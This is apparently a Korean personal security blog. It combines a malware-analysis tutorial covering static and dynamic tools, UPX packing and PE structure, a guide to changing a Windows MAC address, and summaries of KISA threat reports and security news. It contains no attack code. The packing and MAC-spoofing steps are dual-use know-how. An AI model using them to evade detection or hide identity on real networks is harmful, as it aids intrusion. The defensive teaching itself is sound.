2-6. AWS 신은수 보안기술총괄

: 안전한 클라우드 서비스 이용을 통한 정보유출 방지

2-7. 넥슨코리아 김동춘 실장

: 생성형 AI를 활용한 보안업무 혁신

2024년 상반기 사이버 위협 동향 보고서.pdf

7.56MB

출처 : https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&bbsId=B0000127&searchWrd=&menuNo=205021&pageIndex=2&categoryCode=&nttId=71503

KISA 보호나라&KrCERT/CC

www.boho.or.kr

악성코드 분석방법

제나나 — Fri, 1 Mar 2024 17:39:31 +0900

악성코드를 분석하는 방법

1. 초기분석 (기초 정적 분석)
- 실행하지 않고 분석
-직관적이며 신속히 수행

2. 동적분석
- 프로그램을 실행하고 분석

3. 정적분석
- 리버스 엔지니어링

1. 초기분석(초기 정적분석)

악성코드를 실행하지 않고 분석하는 방법

분석 방법

1. 안티 바이러스 스캔 이용

✔ 사용 도구 : virustotal[.]com, malwares[.]com 사이트

1) 바이러스 토탈 Virus Total (www.virustotal.com)
이곳에서는 다양한 안티바이러스 엔진을 사용해서 파일을 분석해 준다.

여러 개의 안티바이러스 엔진으로 스캐닝 가능. 또한 악성코드에 대한 추가 정보 제공

바이러스 토탈

바이러스 걸린 파일을 업로드하면 아래처럼 전 세계의 안티 바이러스 엔진이 바이러스 여부를 알려준다,.

2) 말웨어즈 (malwares.com)

악성코드 해시값, URL, IP 등으로 검색가능

바이러스 토탈과 비슷한 역할을 한다.

2. 해시값 확인

✔ 사용 도구 : HashTab

파일의 해시값을 확일할 수 있는 도구

파일마다 고유의 해시값을 가지고 있기 때문에 동일한 파일은 해시값이 같지만, 악성코드에 감염되어서 파일이 일부 수정되었으면 다른 해시값을 가지기 때문에 악성코드에 감염되었다고 분석할 수 있다.

HashTab 확인

HashTab이 컴퓨터에 설치되어 있으면 파일 오른쪽 클릭 후 [속성]에 [파일 해시]라는 탭이 생기고 해시값을 확인할 수 있다.

3. 문자열 확인

✔ 사용 도구: String, bintext

수상한 프로그램 함수 또는 문자열을 확인 가능

4. 패킹, 프로텍트 여부 확인

패킹 : 실행파일을 압축하는 것. 실행파일 크기를 줄이거나 디버깅을 방지하기 위해 난독화를 목적으로 사용됨. 실행 파일을 압축하되 exe파일로 저장한다.
프로텍트 : 여러 기술을 써서 분석을 어렵게 만드는 것. 예를 들어, 디버깅을 쓰게되면, 컴퓨터가 꺼지는 기능

✔ 사용 도구 : PEID, Exeinfo PE, UPX

Exeinfo PE

[ 패킹 하는 방법/ 확인 방법 ]
1) Exeinfope에 파일 넣기

2) UPX로 압축

명령어) upx -o UPX_notepade.exe notepad.exe
- 패킹을 하면 용량이 줄어들고, 문자열 또는 함수가 검색되지 않음.

파일 크기가 달라짐.

제대로된 함수 확인 불가

3) PEiD로 패킹, 언패킹 여부 확인 가능

5. PE 구조 확인

PE(Portable Executable) 포맷 : 윈도우 실행파일의 규격이 규격만 지키면 어느 윈도우에서나 파일을 실행할 수 있다. 표준안 (1993년) MS에서 제정. 메모리에서도 디스크에 저장된 파일 형태로 바로 실행할 수도 있도록 설게 win32의 기본실행파일 형태(64비트는 PE플러스로 다른 구격)
✔ 사용 도구 : Pe_ppee, hxd, exeinfope, PEview으로 PE 정보 확인 가능

HxD

[ PE 파일의 종류 ]
실행 파일 : .exe, .scr
시스템 파일 : .sys , .vxd
라이브러리 파일: .dll, .ocx, .cpl, .drv

PE : PE헤더와 PE바디로 구성
대부분이 4D 5A : MZ로 시작함

모든 이런 윈도우의 PE구조는 동일함.

2. 동적 분석

악성코드를 분석환경에서 실행시켜서, 실행 이후의 시스템의 변화를 분석하는 단계

즉, 바이러스가 어떻게 동작하는지 분석하는 단계입

종류

프로세스, 파일시스템, 레디스트리, 네트워크 조작 행위에 대한 분석 방법

방법

0. 기초 동적 분석

✔ 사용 도구: 조 샌드박스, File-analyzer.net, Sandboxie

1) 조 샌드박스 (Joe Sandbox)

자동화 분석 툴로 악성코드를 업로드하면 자동으로 가상의 환경에서 실행을 해서 해당 악성코드가 어떤 기능을 악성지표는 무엇인지 등을 보고서 형식으로 작성해 준다.

일부 바이러스의 경우 가상 환경에서 실행이 안 되는 경우가 있어서 제대로 분석이 안 되는 경우도 있다.

2) 직접 실행
- exe파일을 직접 실행
- dll파일은 rundll32.exe

(예) rundll32.exe 악성 dll파일 dll안에 들어있는 함수

1. 프로세스 분석

프로세스의 변화를 실시간으로 확인하는 방법입니다.
✔ 사용 도구: Process Explorer로 정상 프로세스 확인, Process Monitor

- 악성코드가 동작하려면 프로세스의 형태로 동작될 것이기 때문에 새로운 프로세스가 생김.
- 따라서, 실시간으로 프로세스의 변화를 확인하고 있으면 악성코드가 어떠한 프로세스를 생성했는지 확인할 수 있음.

Process Explorer

Process Explorer : 작업관리자와 비슷. pid 번호와 하위 프로세스를 확인할 수 있다.

Process Monitor

Process Monitor : 프로세스가 실행됐을 때 모든 로그가 기록됨.

그래서 Process Explorer에서 잠시 생성되었다가 사라지는 프로세스를 자세히 확일 할 수도 있음. 그러나 모든 로그가 나오기 때문에 불필요한 정보가 많아 필터 사용이 필요

2. 파일시스템 분석

파일시스템의 변화를 실시간으로 확인하는 방법

- 현재 동작하고 있는 파일들의 상태를 감시하면, 악성코드가 새로운 파일을 생성하거나, 기존의 파일을 수정, 삭제하는 등의 동작을 확인할 수 있음.

3. 레지스트리 분석
레지스트리의 변화를 실시간으로 확인하는 방법
✔ 사용 도구: Autoruns

- 특정 악성코드는 시스템의 레지스트리를 조작하여 자신이 원하는 정보를 입력하거나, 중요한 레지스트리를 삭제하여 시스템에 악영향을 미칠 수 있습니다. 따라서, 레지스트리의 변화 또한 실시간으로 감지하여 악성코드가 어떤 동작을 하는지 확인할 수 있다.

[ Autoruns 사용 방법 ]

- 윈도우 자동시작하는 프로그램을 알려줌.
- 운영체제에서 어떤 드라이버, 파일들, 서비스들이 재시작하는지 알 수 있다.
* 일부 악성코드의 특징이 재부팅 시 재시작하므로, autoruns 도구를 통해 잡을 수 있다.

4. 네트워크 분석
네트워크의 변화를 실시간으로 확인하는 방법
✔ 사용 도구: Wireshark, TCPView

Wireshark

TCP View

- 희생자 PC에 악성코드가 침투 후 공격자에게 수집한 정보를 네트워크를 통해서 보내거나 외부로부터 네트워크를 통해 명령을 받아 그 명령에 맞게 동작하기 때문에 네트워크의 변화를 실시간으로 감지하며 악성코드가 어떤 동작을 하는지 확인 가능.

5. 디버깅 도구를 이용해서

디버거를 이용 동작하는 악성 실행 파일의 내부 상태를 점검
✔ 사용 도구: OLLY DBG, x64dbg, immunity debugger, WINDBG 등

x64dbg

파일이 어떻게 동작하는지 디버깅을 통해 확인 가능

3. 정적분석

정적분석은 악성코드 파일을 디스어셈블하여 아주 세부적인 동작을 분석하는 단계

- 정적분석을 하는 방법은 실행파일 만을 가지고 프로그램의 구조를 역분석하는 리버스 엔지니어링이라는 기술을 활용할 수 있습니다.

1. 실행파일을 디스어셈블리하여 악성코드 내부를 역공학
✔ 사용 도구: IDA PRO 등

IDA 화면

[윈도우] 컴퓨터 맥 주소(MAC address) 변경하기

제나나 — Sun, 11 Feb 2024 02:00:49 +0900

[윈도우] 컴퓨터 맥 주소(MAC address) 변경하기

* 임시적으로 바꾸는 것이고 설정을 풀면 원래대로 돌아옵니다.

1. 제어판 > 장치 관리자 > 네트워크 어댑터 > 원하는 네트워크 어댑터 선택

* 네트워크 어댑터의 종류 다양하니 잘 선택

2. 해당 어댑터 오른쪽 클릭 > [속성] 클릭

3. [고급] 탭 선택

4. "네트워크 주소(Network Address)" 또는 "로컬 관리 주소(Locally Administerekd Address)" 선택

5. 값(Value)에 변경하고 싶은 MAC 주소 입력

6. 컴퓨터 재부팅

* WIFI 등 무선네트워크도 동일한 방법으로 변경 가능

* MAC 주소 확인하는 방법 : CMD > ipconfig /all 에서 물리적 주소(Physical Address) 확인

[KISA] 사이버 위협 동향 보고서(2023년 하반기)

제나나 — Sat, 10 Feb 2024 18:12:38 +0900

[KISA] 사이버 위협 동향 보고서(2023년 하반기)

- 한국인터넷진흥원(KISA)에서 발간한 보고서

Part.1 사이버 위협 동향

1-1. 침해사고 현황

1-2. IoT 봇넷 위협 동향

- IP 카메라용 DKR(Digital Video Recorder) 제품으로 미라이(Mirai) 악성코드 전파 및 DDoS 공격 시도가 탐지되고 있음.

- 9월부터 퍼이고 새로운 DDoS 네트워크가 발견, 일일 감연단말 IP 수는 일 평균 22개씩 누적되어 최대 1천 8백여 개

- 대부분의 CPU 아키텍처에 영향을 미치고, 악성코드가 설치되도록 스크립트 파일 형태로 배포

* 네트워크 공격방식 : 킬러 모듈을 이용해 SSH, HTTP 등 같은 서비스 종료시켜 IoT 기기를 사용할 수 없게 만들고, 감염여부를 숨기기 위해 프로세스 이름을 sshd로 변경, 메모리에 복호화된 데이터가 남는 것을 방지하기 위해 사용한 데이터를 다시 암호화하는 과정 추가.

1-3. 보안취약점 및 신고포상제 동향

1-4. 라자루스(Lazarus) 공격 그룹의 특징 및 전망

Part.2 전문가 컬럼

2-1. 이글루코퍼레이션 김미희 팀장

: 제로데이 취약점을 악용한 랜섬웨어(Cl0p) 공격, MOVEit Transfer

2-2. 안랩 ASEC 분석팀

: 사용자가 많은 MS 문서를 악요하는 악성코드 유포 방식의 변화 (MS Office 문서 악성코드 사라지고 CHM, LNK 유포 증가)

* CHM : 윈도우 도움말 파일, LNK : 바로가기 파일 - 파워쉘, CMD 실행해 악의적 쉘 명령어 실행가능

Part.3 기술 보고서

3-1. KISA 침해사고분석단 종합분석팀 김동욱, 이슬기

: TTPs #10 : Operation GoldGoblin

- 제로데이 취약점을 이용해 선별적으로 침투하는 공격전략 분석

3-2. KISA 침해사고분석단 취약점분석팀 이동은, 전지수

: 정부 보고서 위장 MS워드 제로데이 취약점 상세 분석

3-3. KISA 침해사고분석단 취약점분석팀 박지희, 이동은

: MS Outlook 권한 상승 제로데이 취약점 (CVE-2023-23397) 상세분석

2023년 하반기 사이버 위협 동향 보고서.pdf

7.72MB

https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&bbsId=B0000127&searchWrd=&menuNo=205021&pageIndex=1&categoryCode=&nttId=71295

KISA 보호나라&KrCERT/CC

www.boho.or.kr

[KISA] 사이버 위협 동향 보고서(2023년 상반기)

제나나 — Wed, 13 Dec 2023 17:36:30 +0900

[KISA] 사이버 위협 동향 보고서(2023년 상반기)

- 한국인터넷진흥원(KISA)에서 발간한 보고서

Part.1 사이버 위협 동향

1-1. 침해사고 현황

1-2. 피싱사이트 위협 동향

- 텔레그램 사칭 : 1치 계정 탈취 후 등록된 연락처 지인을 대상으로 2차 계정 탈취 공격까지 수행

- 공격방식 : 1차 공격으로 탈취한 계정과 연락처 목록 수집, 2차 계정 탈취를 위해 메시지 발송하는 자동화된 피싱 도구 존재 추정. 세션 가로채기(session hijacking) 기법 보다 정교한 공격으로 진화 가능

1-3. 보안 취약점 및 신고 포상제 동향

1-4. 주요 공격 기법의 변화

- 기업의 Active Directory와 같은 중앙 관리 솔루션을 작악한 이후 악성코드를 내부로 유포하는 기법에서 보안 소프트웨어의 제로데이 취약점을 악용하는 것으로 변화.

Part.2 전문가 컬럼

2-1. 쿠팡 BlueTeam 곽성현 Staff Security Engineer

: 맞춤형 공격 대응을 위한 기업 내 보안조직 운영 방안

2-2. 한국랜섬웨어침해대응센터 이경호 과장

: 랜섬웨어 공격 구조와 취약점 패치의 중요성

2-3. 고려대학교 SW보안연구소 최윤성 교수

: 3CX 연쇄 소프트웨어 공급망 공격 사건과 시사점

2-4. 한국전자통신연구원 사이버보안연구본부 김익균

: 사이버 억지력 강화를 위한 "Defend Forward" 전략의 이해

Part.3 기술 보고서

3-1. KISA 침해사고분석단 종합분석팀 김동욱 선임, 이태우 선임, 이슬기 선임

: TTPs $ ScarCruft Tracking Note

3-2. KISA 침해사고분석단 사고분석팀 신우성 선임,

플레인비트 이예나 선임, 이상아 연구원, 한택승 연구원

: 블랙캣 랜섬웨어 침해사고 기술보고서

2023년 상반기 사이버 위협 동향 보고서.pdf

6.22MB

출처 : https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&bbsId=B0000127&searchWrd=&menuNo=205021&pageIndex=1&categoryCode=&nttId=71172

KISA 보호나라&KrCERT/CC

www.boho.or.kr

[IT/보안뉴스] 챗GPT의 가짜 정보 생성 기능, 멀웨어 개발에 악용된다

제나나 — Sun, 11 Jun 2023 23:51:53 +0900

기사요약 :

생성형 인공지능 챗GPT를 통해 가짜 정보를 생성하려는 특성을 활용하여 챗GPT가 추천할 만한 패키지를 실제로 만든 후에 기다리다 챗GPT의 추천을 받은 개발자가 해당 패키지를 이용하면서 멀웨어 개발에 이용될 수 있다.

- 챗GPT 알고리즘을 훈련 떄 사용했던 데이터가 오래되거나 부정확한 정보 섞일 시 → 부정확한 정보 파악어려움

문가용 기자, 챗GPT의 가짜 정보 생성 기능, 멀웨어 개발에 악용된다, 보안뉴스, https://m.boannews.com/html/detail.html?mtype=6&tab_type=&idx=118958

챗GPT의 가짜 정보 생성 기능, 멀웨어 개발에 악용된다

보안 외신 핵리드에 의하면 생성형 인공지능 모델인 챗GPT를 활용해 악성 코드를 개발하는 방법이 새롭게 발견됐다고 한다. 챗GPT는 가짜 정보를 생성하려는 특성을 가지고 있는데, 이를 공격자

m.boannews.com

[IT/보안뉴스] 해커들이 익스플로잇 하고 있던 윈도 취약점, 세부 내용 공개돼

제나나 — Sat, 10 Jun 2023 19:19:50 +0900

기사 요약 :

그동안 해커들이 사용하는 MS 윈도우 취약점인 Win32k 커널 모드 드러이버를 이용해 권한상승을 하는 취약점이 정기패치로 패치되었지만 아직 정확한 피해 규모는 집계되지 않았다고 한다.

- 취약점 번호 : CVE-2023-29336
- CVSS 점수 : 7.8 (고위험군)
- 패치 적용 : 지난달 정기 패치일
* Win32k를 이용한 취약점이 종종 나오고, 공격자글 또한 자주 노린다고 한다.
- 해당 취약점은 Winows11에는 작동하지 않음

문가용 기자, 해커들이 익스플로잇 하고 있던 윈도 취약점, 세부 내용 공개돼, 보안뉴스, https://m.boannews.com/html/detail.html?mtype=6&tab_type=&idx=118957

해커들이 익스플로잇 하고 있던 윈도 취약점, 세부 내용 공개돼

보안 외신 해커뉴스에 의하면 MS 윈도의 취약점에 대한 익스플로잇 기법이 상세히 공개됐다고 한다. 원래부터 공격자들이 익스플로잇 하고 있었으며, 이에 MS가 패치를 통해 해결한 권한 상승 취

m.boannews.com

분석 보고서 : https://www.numencyber.com/cve-2023-29336-win32k-analysis/

Analysis of CVE-2023-29336 Win32k Privilege Escalation

Analyzing CVE-2023-29336 Win32k vulnerability, its exploitation, and mitigation measures in the context of evolving security practices.

www.numencyber.com

[IT/보안뉴스] 하루살이 전략으로 선회하고 있는 큐봇, 잠자는 시간도 늘려

제나나 — Sun, 4 Jun 2023 22:38:24 +0900

기사요약 :

큐봇(QBot)이라는 멀웨어의 C2서버들 중 1/4은 하루 동안만 유지되고, 하루 이상 유지되는 서버들 중에서도 50%는 일주일 넘게 비활성화 된 상태라고 한다. 큐봇이 유명해지고 탐지율이 늘어남에 따라 탐지와 추적이 어렵게 하는 전략을 채택하면서 그렇다고 한다.

- 큐봇 : 칵봇(QakBot)이라고도 불리며 뱅킹 트로이목마 형태로 처음 등장. 현재는 다운로더로 많이 활용.
- 해당 악성코드는 스피어 피싱 이메일을 통해서 전달.

문가용 기자, 하루살이 전략으로 선회하고 있는 큐봇, 잠자는 시간도 늘려, 보안뉴스, https://www.boannews.com/media/view.asp?idx=118749&page=1&kind=1

하루살이 전략으로 선회하고 있는 큐봇, 잠자는 시간도 늘려

보안 외신 해커뉴스에 의하면 큐봇(QBot)이라는 멀웨어의 C&C 서버들 중 1/4이 단 하루 동안만 유지된다고 한다. 게다가 하루 이상 가는 서버들 중 50%는 일주일 넘게 비활성화 된 상태로 유지되는

www.boannews.com

[IT/보안뉴스] ‘전국연합학력평가’ 성적 유출 해킹범 추적 끝 총 9명 검거... 2명은 구속

제나나 — Fri, 2 Jun 2023 22:17:26 +0900

기사 요약 :

경찰청에 따르면 2월 경기도교육청 학력평가시스템 서버에 불법 침입하여 지난해 11월 실시한 전국연합학력평가에서 고등학교 2학년 성적정보 27만여 건을 탈취 후 텔레그램 채널 관리자에게 전달한 해커가 지난달 26일 검거 및 구속했으며, 해킹 관련자 총 9명 전원이 검거되었다.

- 우회를 위해 해외 IP 사용.
- 탈취 정보를 텔레그램 관리자에게 전달 후 탈퇴
- 유출경로 분석하여 해커 특정
- 서버 취약점을 우연히 발결 후 실력 과시용으로 전달

김영명 기자, ‘전국연합학력평가’ 성적 유출 해킹범 추적 끝 총 9명 검거... 2명은 구속, 보안뉴스,
https://www.boannews.com/media/view.asp?idx=118714

‘전국연합학력평가’ 성적 유출 해킹범 추적 끝 총 9명 검거... 2명은 구속

경기남부경찰청(청장 홍기현) 사이버수사과는 올해 2월 경기도교육청 학력평가시스템 서버에 불법 침입해 지난해 11월 전국연합학력평가 고등학교 2학년 성적정보 27만여건을 탈취한 후, 텔레그

www.boannews.com

[IT/보안뉴스] 기가바이트의 PC 일부에서 백도어와 비슷한 기능 발견돼

제나나 — Thu, 1 Jun 2023 23:55:09 +0900

기사 요약 :

기가바이트(Gigabyte)에서 만든 시스템에서 백도어와 비슷한 기능이 발견되어서 사용자들의 보안조치가 필요하다. 해당 기가바이트 제품이 탑재된 펌웨어 장비가 부팅시에 최신의 윈도 파일을 심고, 이 파일이 추가적인 페이로드를 다운하고 실행하는 기능이 심겨져 있음. 이로 인해 사용자들 모르게 악성코드가 심겨질수 있으며 해당 윈도우 파일은 닷넷 기반이며 아직 모든 PC에 펌웨어 업데이트가 개발되지 않았다고 한다.

- 해당 취약점 위험이 있는 장비 : 기가바이트의 271개의 마더보드(인텔, AMD 칩셋 포함)
- 가장 큰 문제 : 마더보드 펌웨어에 업데이트 프로그램이 있기 때문에 소비자는 쉽제 지울 수 없음.

문가용 기자, 기가바이트의 PC 일부에서 백도어와 비슷한 기능 발견돼, 보안뉴스, https://m.boannews.com/html/detail.html?mtype=6&tab_type=&idx=118702

기가바이트의 PC 일부에서 백도어와 비슷한 기능 발견돼

보안 블로그 시큐리티어페어즈에 의하면 기가바이트(Gigabyte)에서 만든 시스템 일부에서 백도어와 같은 기능이 숨겨져 있다가 발견됐다고 한다. 기가바이트 제품에 탑재된 펌웨어가 장비 부팅

m.boannews.com

https://www.tomshardware.com/news/gigabyte-motherboards-come-with-a-firmware-backdoor

Firmware Backdoor Discovered in Gigabyte Motherboards, 250+ Models Affected

There are ways to protect yourself now and researchers are working to fix it.

www.tomshardware.com

[IT/보안뉴스] 정상적으로 유통되던 안드로이드 앱, 갑자기 멀웨어로 돌변

제나나 — Sun, 28 May 2023 02:20:51 +0900

기사 요약 :

1년 이상 정상적으로 유통 및 사용되던 안드로이드 앱 '아이리코더(iRecorder Screen Recorder)'가 갑자기 오디오와 화면 정보를 수집하는 스파이웨어로 변했다. 가장 먼저 발견한 업체는 이셋(ESET)이며, 현재 구글 앱 스토어에서는 삭제 되었다. 이셋에서는 1년동안 정상적으로 작동했던 이유는 충분한 사용자 수를 확보한 후에 악성 기능을 추가하려고 했던 것으로 보인다고 했다.

사진 출처 :gizchina.com

- 앱 이름 :iRecorder - Screen Recorder
- 앱 출시 : 2021년 9월 19일 Google Play 스토어
- 앱 다운로드 횟수 : 50,000회 이상
- 해당 앱 개발자 : Coffeeholic Dev
- 해당 앱이 악성 행위 시작 : 11개월 후 악성 기능이 추가
- 악성 기능 : 원격으로 마이크 켜고 녹음, c2서버와 연결, 장비에 저장된 녹음파일과 다른 민감한 파일 업로드
1) 훔쳐가는 정보 : 주소록, SMS 메시지, 전화 로그, 브라우저 히스토리, 장치 위치, 장치 스크린샷
2) 악성 기능 : 전화 걸기, 문자보내기, 인터넷 켜기, 스크린샷 찍기
- 조치 : 구글에서 해당 앱에 AhMyth 트로이 목마를 포함하고 있다 신고 후 삭제 함.

문가용 기자,정상적으로 유통되던 안드로이드 앱, 갑자기 멀웨어로 돌변, 보안뉴스, https://www.boannews.com/media/view.asp?idx=118484&page=4&kind=1

정상적으로 유통되던 안드로이드 앱, 갑자기 멀웨어로 돌변

IT 외신 레지스터에 의하면 한 안드로이드 앱이 정상적으로 유통되다가 갑자기 스파이웨어로 돌변했는데, 구글이 이런 상황을 놓쳤다고 한다. 문제의 앱은 아이리코더(iRecorder - Screen Recorder)이며

www.boannews.com

https://www.gizchina.com/2023/05/24/android-screen-recorder-app-irecorder-found-to-be-malware-heres-what-you-need-to-know/

Android Screen Recorder App iRecorder Found To Be Malware: Here's What You Need To Know

The popular iRecorder screen recorder app has been infected with malware. Find out what you need to know and how to protect your device...

www.gizchina.com

https://arstechnica.com/information-technology/2023/05/app-with-50000-google-play-installs-sent-attackers-mic-recordings-every-15-minutes/

Legit app in Google Play turns malicious and sends mic recordings every 15 minutes

The malicious iRecorder app has come to light, but its purpose remains shrouded.

arstechnica.com

[IT/보안뉴스]1년새 2배 된 '웹셀 공격' 비중…SK쉴더스 "초기침투만 집중 안 돼"

제나나 — Fri, 26 May 2023 23:49:19 +0900

기사 요약 :

SK쉴더스는 보안 세미나에서' 웹셸(Webshell)'을 활용한 공격 비중이 2배로 증가하였다고 발표했다. 웹셸은 공격자가 웹서버를 원격으로 제어할 수 있는 악성코드를 의미하며 이런 전통적인 해킹 기법이 성행하는 이유로 '초기 침투'에만 집중하는 경향때문이라고 한다.
이를 개선하기 위해서는 초기 침투뿐만이 아니라 거점확보부터 지속실행단계까지 모든 단계에 주의를 기울여야 한다고 당부했다.
또한 신규 취약점과 랜섬웨어 공격에 대한 주의도 필요하며, 최근에는 랜섬웨어가 보다 치밀한 수법으로 개발되고 있다고 경고했다.

-일반적으로APT(지능형 지속위협) 공격은 △초기 침투 △거점 확보 △권한 상승 △내부 정찰 △내부 이동 △지속 실행 △목표 달성 순으로 흐름
- 웹셸 공격 예시 :2021년 서울대병원 개인정보 유출 사고 역시 '웹쉘 공격'에서 비롯됐다.

오현주 기자,1년새 2배 된 '웹셀 공격' 비중…SK쉴더스 "초기침투만 집중 안 돼", news1, https://n.news.naver.com/mnews/article/421/0006827653?sid=105

1년새 2배 된 '웹셀 공격' 비중…SK쉴더스 "초기침투만 집중 안 돼"

지난해 '웹셀'(Webshell) 활용 공격 비중이 전년 대비 2배로 증가한 것으로 나타났다. '웹셀'은 공격자가 원격으로 웹서버를 제어할 수 있는 악성코드를 말한다. 김성동 SK쉴더스 탑서트(Top-CERT) 담당

n.news.naver.com

[IT/보안뉴스] 강력해진 BEC 공격자들, MS의 ‘불가능한 이동’ 경고도 속인다

제나나 — Thu, 25 May 2023 23:51:40 +0900

기사 요약 :

BEC 공격자들이 MS의 보안 기능 '불가능한 이동(impossible travel)' 경고 신호가 뜨지 않게 하는 공격 전술을 개발하였다. '불가능한 이동' 경고는 현재 접속위치와 마지막 접속 위치간의 물리적인 거리와 시간을 계산해서 정상적인 접속인지를 판단해주는 보안 기능이지만 공격자는 근처 지역에서 생성되는 IP주소를 구매하여 자신들의 로그인 시도를 감추는 방식을 이용하여 우회하고 있다.

- 공격자들이 이용하는 기술 : 불릿프로프트링크(BulletProftLink)와 같은 플렛폼 + 피해자 지역 내 IP서비스 혼합 이용
- BEC 공격 대상 : 기업 임원진, 관리자급 직업(주로 재무 담당자, HR 직원 - 금융/개인정보), 신규직원(실수가 많음)
- 대응방법 : 메일 보안 솔루션 디마카(DMARC) 활성화, 사내 인증 관련 규정 보다 엄격하게 설정, 임직원 교육

문가용 기자,강력해진 BEC 공격자들, MS의 ‘불가능한 이동’ 경고도 속인다, 보안뉴스, https://www.boannews.com/media/view.asp?idx=118448&page=1&kind=1

강력해진 BEC 공격자들, MS의 ‘불가능한 이동’ 경고도 속인다

BEC 공격자들이 탐지 기술을 회피하는 새로운 방법을 터득했다. 근처 지역에서 생성된 IP 주소를 구매해서 자신들의 로그인 시도를 감추는 것이다. 이렇게 했을 때 MS의 보안 기능 중 하나인 ‘불

www.boannews.com

[IT/보안뉴스] 의료기기 사이버보안 가이드라인, 심사·허가 위한 체크리스트와 요구사항 살펴보니

제나나 — Sun, 21 May 2023 09:00:34 +0900

기사 요약:

식품의약품안전처(식약처)는 의료기기의 사이버보안을 강화하기 위해 사이버보안 가이드라인을 제정했다. 가이드라인은 의료기기의 사이버보안 특성과 요구사항을 설명하며, 의료기기의 사이버보안 허가와 심사를 위한 체크리스트도 포함하고 있다.

체크리스트에는 의료기기 사이버보안에 관련된 7가지 항목이 포함되어 있으며, 의료기기의 보안 요구사항이 충족되었는지 확인할 수 있다. 또한, 성능시험성적서, 사이버보안 위험관리문서, 소프트웨어 검증 및 유효성 확인 자료 등이 요구되며, 이를 통해 의료기기의 사이버보안을 확인하고 관리할 수 있다. 의료기기에 대한 사이버보안의 중요성은 의료기기를 통해 사람의 건강과 생명이 위협받을 수 있기에, 식약처는 이를 강조하고 의료기기 사이버보안에 대한 이해도를 높이기 위해 다양한 업무 설명회를 개최하고 있다.

- 의료기기 이용한 사망 사례 :
2020년 9월 독일 뒤셀도르프 대학병원 랜섬웨어 감염으로 인한 시스템 마비로 환자 치료 불가로 다른 병원 이송 중에 위중한 환자 사망.

- 의료기기 체크리스트 :
△보안통신 △데이터 보호 △기기 무결성 △사용자 인증 △소프트웨어 유지·보수 △물리적 접근 △신뢰성 및 가용성 총 7가지로 구성

박은주 기자, 의료기기 사이버보안 가이드라인, 심사·허가 위한 체크리스트와 요구사항 살펴보니, 보안뉴스, https://m.boannews.com/html/detail.html?mtype=3&tab_type=6&idx=117564

의료기기 사이버보안 가이드라인, 심사·허가 위한 체크리스트와 요구사항 살펴보니

식품의약품안전처(이하 식약처)에서는 의료기기 사이버보안 가이드라인을 제정해 의료기기의 사이버보안 사항을 설명하고, 이를 바탕으로 보안을 강화할 수 있도록 하고 있다. 이에 <보안뉴스>

m.boannews.com

[IT/보안뉴스] 구글의 ZIP과 MOV 도메인, 보안 전문가들의 우려 불러일으켜

제나나 — Sat, 20 May 2023 16:29:20 +0900

기사 요약:

구글이 최근 새로운 인터넷 도메인 .zip과 .mov를 제안하였지만 보안 전문가들은 기존의 파일압축 파일과 동영상파일의 확장자와 동일하기 때문에 피싱 등에 악용될 수 있어 우려를 표하고 있다. 예를 들면 트위터에서는 .zip파일과 .mov파일을 도메인으로 인식하여 자동으로 링크가 생성이 된다.

문가용 기자, 구글의 ZIP과 MOV 도메인, 보안 전문가들의 우려 불러일으켜, 보안뉴스, https://m.boannews.com/html/detail.html?mtype=1&idx=118167

구글의 ZIP과 MOV 도메인, 보안 전문가들의 우려 불러일으켜

IT 외신 블리핑컴퓨터에 의하면 구글이 최근 새로운 인터넷 도메인을 제안했다고 한다. 바로 .zip과 .mov이다. 이 외에도 6개의 최고 수준 도메인(TLD)을 새로 도입해 사용자들이 호스팅 웹사이트나

m.boannews.com

[IT/보안뉴스] 위모 미니 스마트 플러그 제품 일부에서 위험한 취약점 나왔으나 패치 없어

제나나 — Fri, 19 May 2023 17:05:01 +0900

F7063 모델 스마트 플러그, 출처 : belkin

기사 요약:

위모(Wemo)의 미니 스마트 플러그 제품에서 취약점리 발생했는데 이를 통해 공격자는 연결된 장비를 원격으로 조작하거나 내부 네트워크에 침투하는 등의 공격을 수행할 수 있게 된다. 이 취약점은 F7C063 모델에서 발견되었으며, 버퍼 오버플로우를 이용하여 원격 명령 삽입을 가능하게 하지만 보안 업체인 스터넘(Sternum)에 따르면 해당 모델은 지원이 종료되어 패치가 제공되지 않을 것이라고 밝혔다.

- 스마트 플러그 : 가정이나 산업 현장에서 사용되는 장비로, 원격에서 모바일 앱을 통해 제어할 수 있는 기능을 제공.
- 이번 취약점 : 스마트 플러그의 펌웨어에서 발생하는 버퍼 오버플로우 취약점으로 분류되며, 긴 FriendlyName 변수를 이용해 공격자가 장비를 조작할 수 있음.
- 취약점 공개 여부 : 스터넘은 이번 연구 결과를 개념 증명용으로만 공개하고 실제 공격 시나리오는 발표하지 않을 예정.
- 대비 방법 : 사용자이 UPNP 포트를 인터넷에 연결하지 않고, 민감한 데이터나 시스템이 연결된 네트워크와 분리되도록 조치하는 것을 권장

문정후 기자, 위모 미니 스마트 플러그 제품 일부에서 위험한 취약점 나왔으나 패치 없어, 보안뉴스, https://www.boannews.com/media/view.asp?idx=118203&page=3&kind=1

위모 미니 스마트 플러그 제품 일부에서 위험한 취약점 나왔으나 패치 없어

위모(Wemo)의 미니 스마트 플러그에서 물리적 피해를 일으킬 수 있는 취약점이 발견됐다. 위모 미니 스마트 플러그는, 어떤 장비든 원격에서 모바일 앱을 통해 제어할 수 있도록 해 주는 장치로,

www.boannews.com

[IT/보안뉴스] 2021년 서울대병원 해킹·개인정보 유출사건, 북한 소행으로 드러났다

제나나 — Sat, 13 May 2023 23:27:25 +0900

기사 요약 :

지난 2021년에 발생한 서울대학교병원 개인정보 유출사건을 수사한결과 북한 해킹조직의 소행으로 밝혀졌으며 21년 5월경부터 6월경까지 국내•외에 소재한 서버 7대를 장악한 이후 내부망에 침입했다고 한다.

- 피해내용
  1) 환자 81만명
  2) 전•현직 직원 1만 7000여명
  >> 83만명의 개인정보 유출
- 북한이라고 추정 이유 : 기존 북한발 사건과 IP, 인터넷 가입 정보, IP주소 세탁법, 시스템 침입•관리 수법이 같음, 북한어휘를 사용

박은주 기자, 2021년 서울대병원 해킹·개인정보 유출사건, 북한 소행으로 드러났다, 보안뉴스, https://m.boannews.com/html/detail.html?tab_type=1&idx=117945

2021년 서울대병원 해킹·개인정보 유출사건, 북한 소행으로 드러났다

경찰청 국가수사본부(사이버수사국)는 지난 2021년에 발생한 서울대학교병원개인정보 유출사건을 수사한 결과, 북한 해킹 조직의 소행이라고 10일 밝혔다.

m.boannews.com

